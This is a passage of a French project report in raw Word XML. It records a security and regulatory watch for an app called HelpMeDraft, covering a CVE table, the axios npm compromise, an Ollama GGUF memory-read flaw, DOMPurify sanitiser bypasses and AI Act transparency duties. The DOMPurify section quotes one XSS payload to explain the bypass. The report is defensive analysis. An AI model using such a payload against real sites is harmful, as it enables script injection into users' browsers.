        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lecture hors limites, chargeur GGUF, sans authentification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">9.1 Critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t>Corrigé — 0.35.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">05/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ollama (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-42248/42249</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mise à jour automatique détournable en RCE persistante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Élevée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Poste concerné</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DOMPurify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-0540</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contournement du nettoyage XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.1 Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t>Corrigé — 3.4.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DOMPurify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-65912</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contournement de validation d'URI via</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ADD_ATTR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5.1 Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Non applicable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PyJWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE-2026-48526</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contournement d'authentification par confusion d'algorithme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7.4 Élevée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Non affecté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">02/08/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI Act</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UE 2024/1689</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Entrée en application des obligations de transparence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Réglementaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Concerné</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">03/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">RGAA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Version 5 annoncée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WCAG 2.2, l'Arcom devient autorité de contrôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Réglementaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">À anticiper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux constats se dégagent de ce tableau. D'abord,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">la sévérité publiée ne prédit pas l'impact réel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la CVE la plus sévère de la liste (9.1) est atténuée par la configuration du projet, tandis que la plus modérée (5.1) affecte directement la version employée. Ensuite, sur huit entrées,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">trois appellent une action</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— ce qui donne la mesure de l'utilité de l'exercice sur six mois de projet.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="140"/>
    <w:bookmarkStart w:id="144" w:name="X863b77041d64306fdf7d8749fa44412f1331788"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Les trois vulnérabilités les plus instructives</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="141" w:name="Xd91f29c2435b05e4baabc6b158360c3844bb9a5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>axios — quand c'est le canal de distribution qui est attaqué</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le 31 mars 2026, un compte de mainteneur npm a été compromis et deux versions piégées d'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">axios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ont été publiées :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1.14.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0.30.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Le paquet installait un programme d'amorçage qui identifiait le système d'exploitation, contactait un serveur de commande et contrôle, puis téléchargeait un cheval de Troie d'accès distant adapté à macOS, Windows ou Linux. CISA a publié une alerte le 20 avril, Microsoft dès le 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">er</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">avril.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le projet n'est pas affecté</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il utilise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">axios@^1.18.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, postérieure aux versions piégées, ce que le fichier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>package-lock.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">permet de vérifier avec certitude.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cet incident a modifié ma pratique sur trois points. Une dépendance saine peut devenir malveillante sans que son code change de nature : c'est le canal de distribution qui a été attaqué, pas le projet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">axios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lui-même. Il n'y a d'ailleurs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">pas de numéro CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, puisqu'il ne s'agit pas d'un défaut de code. J'en retiens qu'il faut commiter le fichier de verrouillage — c'est la seule façon de savoir après coup quelle version exacte a été installée —, ne jamais mettre à jour une dépendance juste avant une échéance sans lire les notes de version, et traiter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>npm audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>comme un contrôle de routine intégré à l'intégration continue (§ 6, cas TS-09 du § 9).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="141"/>
    <w:bookmarkStart w:id="142" w:name="X6d960e4100123691763656c3dffa340a23a8c8b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ollama — le coût caché d'une décision d'architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2026-7482 (CVSS 9.1) est une lecture hors limites en tas dans le chargeur de modèles GGUF, affectant toutes les versions antérieures à 0.17.1. Un attaquant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">non authentifié</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">envoie un fichier GGUF forgé à</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, puis exfiltre la mémoire lue via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/push</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Le risque est amplifié lorsque le serveur écoute sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Le projet était partiellement protégé par sa configuration : Ollama n'écoutait que sur localhost, donc n'était pas exposé au réseau. La mise à jour a été appliquée — 0.35.1 installée, très au-delà du seuil de 0.18 fixé au § 4 du rapport d'audit — et la règle d'écoute sur la seule interface de bouclage est passée du statut d'habitude implicite à celui de consigne écrite (§ 5.2, § 6). Son application explicite par OLLAMA_HOST=127.0.0.1:11434 reste à poser sur le poste : aujourd'hui le comportement par défaut suffit, mais une mesure qui dépend d'un défaut n'est pas une mesure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>Cette entrée éclaire rétrospectivement le choix d'architecture du § 5.2. L'arbitrage entre l'API OpenAI et un modèle local avait été tranché sur le terrain du RGPD : l'inférence locale garantit qu'aucun contenu utilisateur ne quitte l'infrastructure. La veille montre que cet arbitrage a une</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">seconde dimension, opérationnelle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: héberger soi-même, c'est aussi maintenir soi-même. Un service tiers corrige ses vulnérabilités sans que le client ait à agir ; un service local est un composant de plus dans le périmètre de responsabilité. La décision reste la bonne au regard du cahier des charges, mais elle se paie en maintenance — et le dire est plus honnête que de présenter l'inférence locale comme un choix sans contrepartie.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="142"/>
    <w:bookmarkStart w:id="143" w:name="Xbcc3dfe67f9c76ab4bbe686f49bb9fb5d730079"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DOMPurify — une mesure de sécurité est un composant comme un autre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2026-0540 affecte les versions 3.1.3 à 3.3.1 : l'expression régulière</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SAFE_FOR_XML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">omet cinq éléments de type « texte brut », de sorte qu'une charge comme</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/noscript&gt;&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">placée dans une valeur d'attribut survit au nettoyage. Corrigé en 3.3.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Le projet était affecté : il déclarait</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dompurify@^3.2.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La mise à jour a été appliquée vers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>^3.4.16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : version installée et vérifiée dans node_modules le 02/10/2026. La veille a donc produit ici une correction effective, et non une action en attente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C'est l'entrée la plus instructive du journal, parce qu'elle porte sur la bibliothèque ajoutée</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">précisément pour corriger</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>la faille XSS de l'aperçu Markdown (§ 7.1). Découvrir qu'elle porte elle-même une vulnérabilité de contournement établit un principe que je n'avais pas formulé avant :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">une mesure de sécurité est un composant comme un autre, avec sa propre surface d'attaque et son propre cycle de correctifs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ajouter une bibliothèque d'assainissement ne clôt pas le sujet XSS — cela le déplace vers la maintenance de cette bibliothèque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D'où la valeur de la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">défense en profondeur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>: le stockage du contenu en Markdown brut plutôt qu'en HTML (§ 5.2) reste une protection indépendante de DOMPurify. Si la bibliothèque échoue, la donnée stockée n'est toujours pas du HTML exécutable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une seconde CVE sur la même bibliothèque, CVE-2026-65912, illustre l'intérêt de lire les conditions d'exploitation plutôt que la seule plage de versions : elle ne se déclenche que si</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ADD_ATTR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">est fourni comme fonction de prédicat, configuration que le projet n'utilise pas. Même plage de versions, impact réel différent.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="143"/>
    <w:bookmarkEnd w:id="144"/>
    <w:bookmarkStart w:id="147" w:name="X79202165766398048664825bc0becdb7539a322"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Évolutions réglementaires</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="145" w:name="X8c9b54b9e9bba1a773c3871acb0e6be17b651a6"/>
    <w:bookmarkEnd w:id="145"/>
    <w:bookmarkStart w:id="146" w:name="X0d3bb18a8de658abc7319f37ebc9ef8363f8570"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>AI Act — une exigence apparue en cours de projet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Depuis le 2 août 2026, les obligations de transparence du règlement européen sur l'intelligence artificielle sont applicables. Deux concernent HelpMeDraft : informer clairement l'utilisateur qu'il interagit avec une intelligence artificielle, et marquer les contenus générés. Le projet en couvre déjà une partie — le panneau est intitulé « Assistant IA — Ollama », l'action demandée est explicite, et aucune proposition n'est appliquée sans décision de l'utilisateur. Trois compléments restent à produire :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>une mention d'information non ambiguë au premier usage de l'assistant, et non seulement un titre de panneau ;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>une trace des passages issus d'une génération dans le document — la table ia conserve déjà l'information côté base (§ 5.4), il reste à l'exposer côté interface ;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2003"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>une clause dédiée dans les CGU et la politique de confidentialité, distincte du consentement au traitement des données.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Cette entrée justifie la veille comme livrable : le cahier des charges, rédigé avant l'entrée en application du règlement, ne mentionne que le RGPD. Sans ce suivi, l'application aurait été livrée non conforme à une obligation entrée en vigueur trois semaines avant la fin du développement.</w:t>
      </w:r>
